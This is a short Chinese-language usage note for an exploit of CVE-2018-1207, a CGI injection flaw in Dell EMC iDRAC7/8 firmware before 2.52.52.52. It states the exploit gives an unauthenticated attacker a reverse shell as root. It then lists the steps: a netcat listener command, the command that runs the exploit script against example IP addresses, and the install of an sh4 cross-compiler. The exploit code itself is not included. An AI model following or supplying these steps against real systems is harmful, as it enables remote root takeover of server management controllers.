利用 iDRAC 7 & 8 固件 < 2.52.52.52
Dell EMC iDRAC7/iDRAC8 在 2.52.52.52 之前的版本中存在 CGI 注入漏洞,该漏洞可用于执行远程代码。远程未认证攻击者可能能够利用 CGI 变量来执行远程代码。
此代码应导致 iDRAC 服务以 root 用户身份打开一个反向 shell。
启动本地监听器: nc -v -l -p local_port
nc -v -l -p 5500
运行漏洞利用程序: python ./cve-2018-1207.py remote_host remote_port local_host local_port
python ./cve-2018-1207.py 192.168.1.10 443 192.168.1.200 5500
你需要安装一个 sh4-linux-gnu-gcc 版本,当前为 sh4-linux-gnu-gcc-11
你可以通过 apt install gcc-11-sh4-linux-gnu 进行安装